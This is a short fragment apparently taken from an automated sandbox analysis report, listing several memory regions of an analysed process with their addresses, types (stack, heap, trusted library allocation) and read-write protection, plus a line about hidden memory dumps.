1ADFE000
|
stack
|
page read and write
|
||
|
1AFAD000
|
stack
|
page read and write
|
||
|
786000
|
heap
|
page read and write
|
||
|
17DE000
|
stack
|
page read and write
|
||
|
DDF000
|
heap
|
page read and write
|
||
|
F50000
|
trusted library allocation
|
page read and write
|
||
|
992000
|
heap
|
page read and write
|
There are 377 hidden memdumps, click here to show them.